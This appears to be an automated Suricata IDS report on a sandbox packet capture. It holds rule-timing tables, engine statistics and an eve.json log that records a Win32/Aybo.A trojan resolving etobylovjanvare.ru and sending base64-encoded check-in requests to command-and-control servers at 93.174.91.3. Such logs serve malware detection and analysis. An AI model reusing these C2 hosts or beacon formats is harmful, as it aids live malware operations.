Filename: 75eabd849a48ce317345ba33dfe57943800a1e0e37f64d6e162759b3334180a9_network.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 27.8937249184 seconds
Hash: bc723fab22ff6f9155158c04712f3dbe
Uploaded: 1574428612

Logfiles


suricata-4.0.0-etpro-all-perf.txt-2019-11-22-T-13-17-20-11222019.1316-75eabd849a48ce317345ba33dfe57943800a1e0e37f64d6e162759b3334180a9_network.pcap.txt - (59735 bytes)
  --------------------------------------------------------------------------
  Date: 11/22/2019 -- 13:17:20. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2828876      1        1        13127542     3.13   30       0        12982024    437584.73   0.00        437584.73  
  2        2807793      1        4        10028740     2.39   15       0        9271202     668582.67   0.00        668582.67  
  3        2020569      1        1        2566376      0.61   3        0        2332482     855458.67   0.00        855458.67  
  4        2826500      1        2        2247978      0.54   1        0        2247978     2247978.00  0.00        2247978.00 
  5        2801929      1        7        7977742      1.90   56       0        627294      142459.68   0.00        142459.68  
  6        2803027      1        6        14967148     3.57   99       0        584892      151183.31   0.00        151183.31  
  7        2801930      1        7        8030764      1.91   56       0        582810      143406.50   0.00        143406.50  
  8        2020963      1        2        1085794      0.26   14       0        462318      77556.71    0.00        77556.71   
  9        2021151      1        1        1621714      0.39   246      0        422792      6592.33     0.00        6592.33    
  10       2819664      1        2        10166552     2.42   51       0        413782      199344.16   0.00        199344.16  
  11       2819930      1        2        9906166      2.36   51       0        404864      194238.55   0.00        194238.55  
  12       2804911      1        3        4518224      1.08   33       0        358398      136915.88   0.00        136915.88  
  13       2804927      1        2        3472864      0.83   22       0        351810      157857.45   0.00        157857.45  
  14       2802987      1        5        16912416     4.03   174      0        350612      97197.79    0.00        97197.79   
  15       2820158      1        2        15641702     3.73   81       0        349242      193107.43   0.00        193107.43  
  16       2024909      1        2        3082222      0.73   76       0        324792      40555.55    0.00        40555.55   
  17       2820157      1        2        15646216     3.73   81       0        322766      193163.16   0.00        193163.16  
  18       2022132      1        1        6916646      1.65   1276     0        308234      5420.57     0.00        5420.57    
  19       2811447      1        2        486432       0.12   39       0        293688      12472.62    0.00        12472.62   
  20       2803657      1        5        1971580      0.47   14       0        254176      140827.14   0.00        140827.14  
  21       2804907      1        3        3688138      0.88   28       0        253374      131719.21   0.00        131719.21  
  22       2804906      1        3        3712982      0.89   29       0        251046      128033.86   0.00        128033.86  
  23       2813059      1        4        1523526      0.36   11       0        237282      138502.36   0.00        138502.36  
  24       2802991      1        5        3263454      0.78   28       0        236676      116551.93   0.00        116551.93  
  25       2016855      1        2        233586       0.06   1        0        233586      233586.00   0.00        233586.00  
  26       2020865      1        3        4890358      1.17   32       0        228652      152823.69   0.00        152823.69  
  27       2016854      1        3        179018       0.04   1        0        179018      179018.00   0.00        179018.00  
  28       2808144      1        2        172910       0.04   1        0        172910      172910.00   0.00        172910.00  
  29       2808063      1        2        1225098      0.29   14       0        171988      87507.00    0.00        87507.00   
  30       2022797      1        2        623344       0.15   5        0        167236      124668.80   0.00        124668.80  
  31       2805985      1        2        376590       0.09   3        0        166746      125530.00   0.00        125530.00  
  32       2827094      1        2        269026       0.06   2        0        158218      134513.00   0.00        134513.00  
  33       2008575      1        5        20876142     4.98   1956     0        154252      10672.87    0.00        10672.87   
  34       2018789      1        3        147474       0.04   1        0        147474      147474.00   0.00        147474.00  
  35       2808234      1        1        324186       0.08   3        0        142040      108062.00   0.00        108062.00  
  36       2018982      1        2        304218       0.07   3        0        141156      101406.00   0.00        101406.00  
  37       2807400      1        3        321016       0.08   3        0        137590      107005.33   0.00        107005.33  
  38       2022989      1        2        390488       0.09   4        0        137006      97622.00    0.00        97622.00   
  39       2022524      1        4        328408       0.08   3        0        136392      109469.33   0.00        109469.33  
  40       2017572      1        5        380584       0.09   4        0        136034      95146.00    0.00        95146.00   
  41       2819694      1        2        1232934      0.29   44       0        135934      28021.23    0.00        28021.23   
  42       2020826      1        7        128792       0.03   1        1        128792      128792.00   128792.00   0.00       
  43       2022050      1        3        296144       0.07   3        0        125524      98714.67    0.00        98714.67   
  44       2016141      1        5        120900       0.03   1        1        120900      120900.00   120900.00   0.00       
  45       2017259      1        12       927764       0.22   15       0        120640      61850.93    0.00        61850.93   
  46       2807961      1        3        429092       0.10   4        0        119406      107273.00   0.00        107273.00  
  47       2807682      1        2        569338       0.14   14       0        118162      40667.00    0.00        40667.00   
  48       2024829      1        2        2736542      0.65   66       0        116228      41462.76    0.00        41462.76   
  49       2828008      1        2        653958       0.16   16       0        115414      40872.38    0.00        40872.38   
  50       2008438      1        20       259238       0.06   3        0        113646      86412.67    0.00        86412.67   
  51       2015877      1        6        994090       0.24   15       0        110278      66272.67    0.00        66272.67   
  52       2019707      1        2        109560       0.03   1        0        109560      109560.00   0.00        109560.00  
  53       2815181      1        3        881078       0.21   14       0        109476      62934.14    0.00        62934.14   
  54       2827279      1        5        697542       0.17   16       0        105394      43596.38    0.00        43596.38   
  55       2018241      1        2        114262       0.03   3        0        104702      38087.33    0.00        38087.33   
  56       2016706      1        20       952966       0.23   15       0        101518      63531.07    0.00        63531.07   
  57       2810991      1        4        1217124      0.29   15       0        101336      81141.60    0.00        81141.60   
  58       2807970      1        8        769552       0.18   15       0        100924      51303.47    0.00        51303.47   
  59       2826727      1        2        260698       0.06   3        0        100510      86899.33    0.00        86899.33   
  60       2816895      1        2        929370       0.22   14       0        97724       66383.57    0.00        66383.57   
  61       2820931      1        2        1128578      0.27   44       0        96284       25649.50    0.00        25649.50   
  62       2815156      1        2        748642       0.18   14       0        95996       53474.43    0.00        53474.43   
  63       2024228      1        3        260458       0.06   3        0        95910       86819.33    0.00        86819.33   
  64       2022502      1        4        1070260      0.26   15       0        95642       71350.67    0.00        71350.67   
  65       2820289      1        2        1167832      0.28   14       0        95452       83416.57    0.00        83416.57   
  66       2017456      1        3        852808       0.20   14       0        95192       60914.86    0.00        60914.86   
  67       2018147      1        2        336618       0.08   4        0        93594       84154.50    0.00        84154.50   
  68       2816530      1        2        174338       0.04   2        0        93468       87169.00    0.00        87169.00   
  69       2825608      1        2        93176        0.02   1        0        93176       93176.00    0.00        93176.00   
  70       2815568      1        2        885382       0.21   15       0        92744       59025.47    0.00        59025.47   
  71       2014442      1        6        960804       0.23   14       0        92212       68628.86    0.00        68628.86   
  72       2828986      1        2        737258       0.18   14       0        91450       52661.29    0.00        52661.29   
  73       2807130      1        4        3534438      0.84   135      0        90324       26181.02    0.00        26181.02   
  74       2806027      1        3        721858       0.17   15       14       90222       48123.87    48246.43    46408.00   
  75       2016809      1        5        828488       0.20   15       0        89450       55232.53    0.00        55232.53   
  76       2021075      1        2        854102       0.20   14       14       89414       61007.29    61007.29    0.00       
  77       2809850      1        2        132174       0.03   2        0        89348       66087.00    0.00        66087.00   
  78       2021418      1        9        888452       0.21   15       0        89084       59230.13    0.00        59230.13   
  79       2013352      1        4        99510        0.02   3        0        89030       33170.00    0.00        33170.00   
  80       2014819      1        3        88410        0.02   1        0        88410       88410.00    0.00        88410.00   
  81       2018959      1        3        99212        0.02   3        1        88330       33070.67    88330.00    5441.00    
  82       2017076      1        9        862432       0.21   14       0        87312       61602.29    0.00        61602.29   
  83       2809306      1        4        3253078      0.78   117      0        87252       27804.09    0.00        27804.09   
  84       2022896      1        5        86024        0.02   1        0        86024       86024.00    0.00        86024.00   
  85       2017454      1        12       823592       0.20   14       0        85968       58828.00    0.00        58828.00   
  86       2019378      1        12       828482       0.20   14       0        83608       59177.29    0.00        59177.29   
  87       2815180      1        3        817088       0.19   14       0        83338       58363.43    0.00        58363.43   
  88       2022550      1        16       82816        0.02   1        0        82816       82816.00    0.00        82816.00   
  89       2016537      1        2        11170850     2.66   435      0        82216       25680.11    0.00        25680.11   
  90       2022901      1        2        801770       0.19   15       0        79990       53451.33    0.00        53451.33   
  91       2802880      1        3        238090       0.06   6        0        78866       39681.67    0.00        39681.67   
  92       2009897      1        14       88120        0.02   3        0        78606       29373.33    0.00        29373.33   
  93       2022830      1        2        78210        0.02   1        0        78210       78210.00    0.00        78210.00   
  94       2021413      1        2        722810       0.17   15       0        77504       48187.33    0.00        48187.33   
  95       2815220      1        2        799818       0.19   14       0        77318       57129.86    0.00        57129.86   
  96       2014405      1        10       77070        0.02   1        0        77070       77070.00    0.00        77070.00   
  97       2024771      1        1        15051486     3.59   1987     0        77066       7574.98     0.00        7574.98    
  98       2014353      1        6        86372        0.02   3        0        76960       28790.67    0.00        28790.67   
  99       2022658      1        4        76944        0.02   1        0        76944       76944.00    0.00        76944.00   
  100      2024777      1        2        7734914      1.84   1511     0        76486       5119.07     0.00        5119.07    
  101      2021607      1        6        76176        0.02   1        0        76176       76176.00    0.00        76176.00   
  102      2020991      1        2        76148        0.02   1        0        76148       76148.00    0.00        76148.00   
  103      2019714      1        10       75238        0.02   1        0        75238       75238.00    0.00        75238.00   
  104      2811905      1        3        845110       0.20   14       0        74712       60365.00    0.00        60365.00   
  105      2809363      1        3        771360       0.18   15       0        73400       51424.00    0.00        51424.00   
  106      2017036      1        3        779288       0.19   14       0        73114       55663.43    0.00        55663.43   
  107      2019395      1        2        295288       0.07   5        0        72754       59057.60    0.00        59057.60   
  108      2017948      1        2        745608       0.18   15       0        72444       49707.20    0.00        49707.20   
  109      2811700      1        2        71298        0.02   1        0        71298       71298.00    0.00        71298.00   
  110      2009028      1        11       80576        0.02   3        0        70752       26858.67    0.00        26858.67   
  111      2820117      1        2        299544       0.07   5        0        70682       59908.80    0.00        59908.80   
  112      2013441      1        9        81176        0.02   3        0        70652       27058.67    0.00        27058.67   
  113      2013511      1        3        898356       0.21   15       0        70642       59890.40    0.00        59890.40   
  114      2001330      1        8        9544570      2.28   1935     0        70560       4932.59     0.00        4932.59    
  115      2815182      1        3        785422       0.19   14       0        70170       56101.57    0.00        56101.57   
  116      2810481      1        4        3658346      0.87   102      0        69606       35866.14    0.00        35866.14   
  117      2021718      1        4        813614       0.19   14       0        69068       58115.29    0.00        58115.29   
  118      2009909      1        10       79334        0.02   3        0        68352       26444.67    0.00        26444.67   
  119      2017556      1        3        810780       0.19   14       0        68316       57912.86    0.00        57912.86   
  120      2017552      1        6        11229080     2.68   451      0        68232       24898.18    0.00        24898.18   
  121      2019094      1        5        714044       0.17   15       0        68164       47602.93    0.00        47602.93   
  122      2811826      1        7        800578       0.19   14       0        68150       57184.14    0.00        57184.14   
  123      2017119      1        4        673028       0.16   14       0        68042       48073.43    0.00        48073.43   
  124      2814883      1        3        841630       0.20   15       0        67552       56108.67    0.00        56108.67   
  125      2018403      1        10       

This file has been truncated.


packet_stats.log - (14936 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          2477          5050392     1371809036     803364872       1989.9b   99.26
 IPv4      17            12          9040214     1314545416     241550807          2.9b    0.14
 IPv6      17            14          6895118     1345869276     854692158         12.0b    0.60
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          2477           115640       29684148        584215          1.4b   93.56
TMM_FLOWWORKER              IPv4      17            12           241274       25452014       2589418         31.1m    2.01
TMM_RECEIVEPCAPFILE         IPv4       6          2473             4442       15552558         16539         40.9m    2.64
TMM_RECEIVEPCAPFILE         IPv4      17            12             4434           5346          4645         55.7k    0.00
TMM_DECODEPCAPFILE          IPv4       6          2473             4550        4659222          8625         21.3m    1.38
TMM_DECODEPCAPFILE          IPv4      17            12             4696           5634          4932         59.2k    0.00
TMM_FLOWWORKER              IPv6      17            14           221412        1348740        424437          5.9m    0.38
TMM_RECEIVEPCAPFILE         IPv6      17            14             4478          11802          5108         71.5k    0.00
TMM_DECODEPCAPFILE          IPv6      17            14             4688          55416          8534        119.5k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          2473             4748          81764          5758         14.2m  1.03  
flow                    IPv4      17            12             4770          13460          7713         92.6k  0.01  
stream                  IPv4       6          2477             4504        4495814         13751         34.1m  2.45  
app-layer               IPv4      17            12             4534          71038         21162        253.9k  0.02  
detect                  IPv4       6          2477            77530       29571856        530877          1.3b  94.74 
detect                  IPv4      17            12           213340        1005874        492258          5.9m  0.43  
tcp-prune               IPv4       6          2477             4422          56622          5177         12.8m  0.92  
flow                    IPv6      17            14             4790          43122          9340        130.8k  0.01  
app-layer               IPv6      17            14             4478          62552         12265        171.7k  0.01  
detect                  IPv6      17            14           193606        1208536        380874          5.3m  0.38  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             8             5172          71578         17021        136.2k  57.81 
http                    IPv4      17             1             5172           5172          5172          5.2k  2.20  
dns                     IPv4      17             6             5710          32290         13977         83.9k  35.60 
http                    IPv6      17             2             5172           5172          5172         10.3k  4.39  
Proto detect            IPv4      17             9             4734          23718         10550         95.0k
Proto detect            IPv6      17             5             4654          51132         15614         78.1k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            16            26824         147590         57855        925.7k  3.04  
LOGGER_UNIFIED2             IPv4       6            16            28994         123328         54835        877.4k  2.88  
LOGGER_JSON_ALERT           IPv4       6            16            48304         117084         76527          1.2m  4.02  
LOGGER_JSON_DNS             IPv4      17             6            34370       24326294       4090869         24.5m  80.50 
LOGGER_JSON_HTTP            IPv4       6            16            40104         311726         87397          1.4m  4.59  
LOGGER_JSON_FILE            IPv4       6            16            58856         150796         95088          1.5m  4.99  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6          2028             4526        2814794         36028        73.1m  17.65 
payload                           IPv4      17            12             5772         292644         73222       878.7k  0.21  
stream                            IPv4       6          2028             4426       26572816         76348       154.8m  37.40 
http_uri                          IPv4       6            16            17666         268172         75938         1.2m  0.29  
http_request_line                 IPv4       6            16             6866          23510         12170       194.7k  0.05  
http_client_body                  IPv4       6            16             4806           6136          5368        85.9k  0.02  
http_header (request)             IPv4       6            16            23514         282684         81947         1.3m  0.32  
http_header (request trailer)     IPv4       6            16             4514           5408          4609        73.8k  0.02  
http_header_names (request)       IPv4       6            16            10756          78856         24973       399.6k  0.10  
http_accept (request)             IPv4       6            16             4982          22240          7437       119.0k  0.03  
http_referer (request)            IPv4       6            16             4818           6374          5199        83.2k  0.02  
http_content_len (request)        IPv4       6            16             4986          34862          7307       116.9k  0.03  
http_content_type (request)       IPv4       6            16             4924          50914         17003       272.1k  0.07  
http_protocol (request)           IPv4       6            16             5534           9288          7198       115.2k  0.03  
http_start (request)              IPv4       6            16            10196          45556         17810       285.0k  0.07  
http_raw_header (request)         IPv4       6            16            12632          41392         18627       298.0k  0.07  
http_method                       IPv4       6            16             5500          23980         10795       172.7k  0.04  
http_cookie (request)             IPv4       6            16             4782          21916          6902       110.4k  0.03  
http_raw_uri                      IPv4       6            16             7026          31128         11069       177.1k  0.04  
http_user_agent                   IPv4       6            16             5724          36272         10989       175.8k  0.04  
http_host                         IPv4       6            16             5244          34604          8694       139.1k  0.03  
dns_query                         IPv4      17             3            16630          23790         20805        62.4k  0.02  
http_response_line                IPv4       6            16             5502          29144         11416       182.7k  0.04  
http_header (response)            IPv4       6            16            18794         110072         52836       845.4k  0.20  
http_header (response trailer)    IPv4       6            16             4482           4804          4568        73.1k  0.02  
http_content_type (response)      IPv4       6            16             6384          33104         14781       236.5k  0.06  
http_raw_header (response)        IPv4       6          1987             6090          75696          6817        13.5m  3.27  
http_cookie (response)            IPv4       6            16             5028           6884          5433        86.9k  0.02  
http_stat_code                    IPv4       6            16             4982          13260          6678       106.9k  0.03  
file_data (http response)         IPv4       6          1971             4450        1667130         83099       163.8m  39.57 
Total                             IPv4                  8413                                         49097       413.1m
payload                           IPv6      17            14             5644         447910         64304       900.3k  0.22  
Total                             IPv6                    14                                         64304       900.3k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6            12            59482         263054        120799          1.4m  0.08  
PROF_DETECT_IPONLY          IPv4      17             9             6232         135744         58336        525.0k  0.03  
PROF_DETECT_RULES           IPv4       6          2477             4428       17510242        197122        488.3m  26.49 
PROF_DETECT_RULES           IPv4      17            12           112750         491784        238693          2.9m  0.16  
PROF_DETECT_STATEFUL_START    IPv4       6           774             8894       10717848        146890        113.7m  6.17  
PROF_DETECT_STATEFUL_CONT    IPv4       6          2477             4402         189642         31527         78.1m  4.24  
PROF_DETECT_STATEFUL_CONT    IPv4      17            12             4492          55358         11813        141.8k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          2453             4456         422704          5144         12.6m  0.68  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             6             4542           5184          4766         28.6k  0.00  
PROF_DETECT_PREFILTER       IPv4       6          2477            13428       28488156        230621        571.2m  30.99 
PROF_DETECT_PREFILTER       IPv4      17            12            41730         343856        125048          1.5m  0.08  
PROF_DETECT_PF_PAYLOAD      IPv4       6          2028            31608       26620362        127321        258.2m  14.01 
PROF_DETECT_PF_PAYLOAD      IPv4      17            12            14746         302064         82341        988.1k  0.05  
PROF_DETECT_PF_TX           IPv4       6          2453             4464       12821482         94505        231.8m  12.57 
PROF_DETECT_PF_TX           IPv4      17             3            26334          32900         30618         91.9k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6          1851             4456          36066          5682         10.5m  0.57  
PROF_DETECT_PF_SORT1        IPv4      17            12             4582           6458          5343         64.1k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6          2477             4406          95340          5336         13.2m  0.72  
PROF_DETECT_PF_SORT2        IPv4      17            12             4444          47806         10296        123.6k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6          2477             4418          66676          5242         13.0m  0.70  
PROF_DETECT_NONMPMLIST      IPv4      17            12             4454          14334          5583         67.0k  0.00  
PROF_DETECT_ALERT           IPv4       6          2477             4408          34784          5052         12.5m  0.68  
PROF_DETECT_ALERT           IPv4      17            12             4420           5760          4701         56.4k  0.00  
PROF_DETECT_CLEANUP         IPv4       6          2477             4460          83828          5167         12.8m  0.69  
PROF_DETECT_CLEANUP         IPv4      17            12             4446           8756          5192         62.3k  0.00  
PROF_DETECT_GETSGH          IPv4       6          2477             4406         326578          5459         13.5m  0.73  
PROF_DETECT_GETSGH          IPv4      17            12             4686          11350          8611        103.3k  0.01  
PROF_DETECT_IPONLY          IPv6      17             5             5170          64746         20714        103.6k  0.01  
PROF_DETECT_RULES           IPv6      17            14            94144         267914        171077          2.4m  0.13  
PROF_DETECT_STATEFUL_CONT    IPv6      17            14             4406           5946          4833         67.7k  0.00  
PROF_DETECT_PREFILTER       IPv6      17            14            41510         561454        110055          1.5m  0.08  
PROF_DETECT_PF_PAYLOAD      IPv6      17            14            14484         457064         74673          1.0m  0.06  
PROF_DETECT_PF_SORT1        IPv6      17            14             4592          13328          6353         88.9k  0.00  
PROF_DETECT_PF_SORT2        IPv6      17            14             4454          61868          9441        132.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv6      17            14             4424           6264          4974         69.6k  0.00  
PROF_DETECT_ALERT           IPv6      17            14             4418          22894          5889         82.4k  0.00  
PROF_DETECT_CLEANUP         IPv6      17            14             4434           7822          4950         69.3k  0.00  
PROF_DETECT_GETSGH          IPv6      17            14             4432         202174         25413        355.8k  0.02  


stats.log - (2845 bytes)
------------------------------------------------------------------------------------
Date: 11/22/2019 -- 13:17:20 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 2511
decoder.bytes                              | Total                     | 3028010
decoder.ipv4                               | Total                     | 2485
decoder.ipv6                               | Total                     | 14
decoder.ethernet                           | Total                     | 2511
decoder.tcp                                | Total                     | 2473
decoder.udp                                | Total                     | 26
decoder.avg_pkt_size                       | Total                     | 1205
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 7
flow.udp                                   | Total                     | 11
tcp.sessions                               | Total                     | 5
tcp.syn                                    | Total                     | 7
tcp.synack                                 | Total                     | 4
tcp.rst                                    | Total                     | 5
tcp.overlap                                | Total                     | 1
detect.alert                               | Total                     | 18
detect.mpm_list                            | Total                     | 7
detect.nonmpm_list                         | Total                     | 1
detect.match_list                          | Total                     | 7
app_layer.flow.http                        | Total                     | 4
app_layer.tx.http                          | Total                     | 16
app_layer.flow.dns_udp                     | Total                     | 3
app_layer.tx.dns_udp                       | Total                     | 3
app_layer.flow.failed_udp                  | Total                     | 8
flow_mgr.new_pruned                        | Total                     | 7
flow.spare                                 | Total                     | 10000
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65536
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7078336


eve.json - (26500 bytes)
{"timestamp":"2017-05-03T18:40:26.424280+0000","flow_id":950287889758552,"pcap_cnt":20,"event_type":"dns","src_ip":"192.168.56.19","src_port":51871,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9830,"rrname":"dns.msftncsi.com","rrtype":"A","tx_id":0}}
{"timestamp":"2017-05-03T18:40:26.429312+0000","flow_id":950287889758552,"pcap_cnt":21,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.19","dest_port":51871,"proto":"UDP","dns":{"type":"answer","id":9830,"rcode":"NOERROR","rrname":"dns.msftncsi.com","rrtype":"A","ttl":20,"rdata":"131.107.255.255"}}
{"timestamp":"2017-05-03T18:40:26.429642+0000","flow_id":1478843745078858,"pcap_cnt":22,"event_type":"dns","src_ip":"192.168.56.19","src_port":57578,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64298,"rrname":"dns.msftncsi.com","rrtype":"AAAA","tx_id":0}}
{"timestamp":"2017-05-03T18:40:26.434455+0000","flow_id":1478843745078858,"pcap_cnt":23,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.19","dest_port":57578,"proto":"UDP","dns":{"type":"answer","id":64298,"rcode":"NOERROR","rrname":"dns.msftncsi.com","rrtype":"AAAA","ttl":185,"rdata":"fd3e:4f5a:5b81:0000:0000:0000:0000:0001"}}
{"timestamp":"2017-05-03T18:40:33.967338+0000","flow_id":1751136082182826,"pcap_cnt":24,"event_type":"dns","src_ip":"192.168.56.19","src_port":51250,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26475,"rrname":"etobylovjanvare.ru","rrtype":"A","tx_id":0}}
{"timestamp":"2017-05-03T18:40:33.977078+0000","flow_id":1751136082182826,"pcap_cnt":25,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.19","dest_port":51250,"proto":"UDP","dns":{"type":"answer","id":26475,"rcode":"NOERROR","rrname":"etobylovjanvare.ru","rrtype":"A","ttl":2707,"rdata":"46.36.36.116"}}
{"timestamp":"2017-05-03T18:40:34.039265+0000","flow_id":1110642641671860,"pcap_cnt":33,"event_type":"http","src_ip":"192.168.56.19","src_port":55947,"dest_ip":"46.36.36.116","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"etobylovjanvare.ru","url":"\/0942c3aad278ce5ea571a61712b4506a.php","http_user_agent":"DMFR","http_content_type":"application\/octet-stream"}}
{"timestamp":"2017-05-03T18:40:34.112005+0000","flow_id":1501396618889578,"pcap_cnt":40,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:40:34.112005+0000","flow_id":1501396618889578,"pcap_cnt":40,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WXpKV2VtTXliSFppYm5kM1prUkZNMDFVVFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:40:34.162162+0000","flow_id":1501396618889578,"pcap_cnt":41,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55948,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WXpKV2VtTXliSFppYm5kM1prUkZNMDFVVFQwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":80},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":80,"tx_id":0}}
{"timestamp":"2017-05-03T18:40:34.587187+0000","flow_id":1501396618889578,"pcap_cnt":43,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":1,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:40:34.587187+0000","flow_id":1501396618889578,"pcap_cnt":43,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WTIxV2JtRllUakJhV0VvNFVWaHNhRmx0T1RCbVJGRjNVMFpDTTFwR1VsVlhWMDQ0VTFjMU1GcFhkMnhOYW1oVFNsUkpOVXN4YUd4aU1qUnNUV3BvVTBwVVNUVkxNRTVSVmxOMFJrNVRNSGxPYW1kM1N6TlpNRXQ1VlRCTlEzTjVUR3BSZDFJd2FEWkxlVEJ5VFZSQk1FNVRkRTVUU0c5eVMzbHplVTFFVVROVVZVbHlTM2x6ZDFwRGMzaGhRM042WWxOemVVMXVUWEpMZVhSWVlWYzBNMHQ1YzNKV1ZrNUNaa1JLT0UxNlNqaFdiV3g1WkVoV2FHSkZTblpsUTBKSVkyMUdkMkZIYkdwamVVSkNXa2RHZDJSSFZuaz0=","http_user_agent":"DMFR","http_content_type":"text\/html"}}
{"timestamp":"2017-05-03T18:40:34.601895+0000","flow_id":1501396618889578,"pcap_cnt":44,"event_type":"fileinfo","src_ip":"93.174.91.3","src_port":80,"dest_ip":"192.168.56.19","dest_port":55948,"proto":"TCP","http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=WTIxV2JtRllUakJhV0VvNFVWaHNhRmx0T1RCbVJGRjNVMFpDTTFwR1VsVlhWMDQ0VTFjMU1GcFhkMnhOYW1oVFNsUkpOVXN4YUd4aU1qUnNUV3BvVTBwVVNUVkxNRTVSVmxOMFJrNVRNSGxPYW1kM1N6TlpNRXQ1VlRCTlEzTjVUR3BSZDFJd2FEWkxlVEJ5VFZSQk1FNVRkRTVUU0c5eVMzbHplVTFFVVROVVZVbHlTM2x6ZDFwRGMzaGhRM042WWxOemVVMXVUWEpMZVhSWVlWYzBNMHQ1YzNKV1ZrNUNaa1JLT0UxNlNqaFdiV3g1WkVoV2FHSkZTblpsUTBKSVkyMUdkMkZIYkdwamVVSkNXa2RHZDJSSFZuaz0=","http_user_agent":"DMFR","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":44},"app_proto":"http","fileinfo":{"filename":"\/classes\/s.php","gaps":false,"state":"CLOSED","stored":false,"size":44,"tx_id":1}}
{"timestamp":"2017-05-03T18:40:34.815152+0000","flow_id":1501396618889578,"pcap_cnt":46,"event_type":"alert","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":2,"alert":{"action":"allowed","gid":1,"signature_id":2806027,"rev":3,"signature":"ETPRO TROJAN Win32\/Aybo.A Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2017-05-03T18:40:34.815152+0000","flow_id":1501396618889578,"pcap_cnt":46,"event_type":"http","src_ip":"192.168.56.19","src_port":55948,"dest_ip":"93.174.91.3","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"93.174.91.3","url":"\/classes\/s.php?query=V2pKV01HUkhSbnBoTTNkNlQxUk5NVTFVUWpoUldHeG9XVzA1TUdaRVNYVk9WRnBzWlVoNGRWcFlWakJqYlRsMVdETk9NRmxZU1QwPQ==","http_user_agent":"DMFR","http_content_type":"text\/html"}}
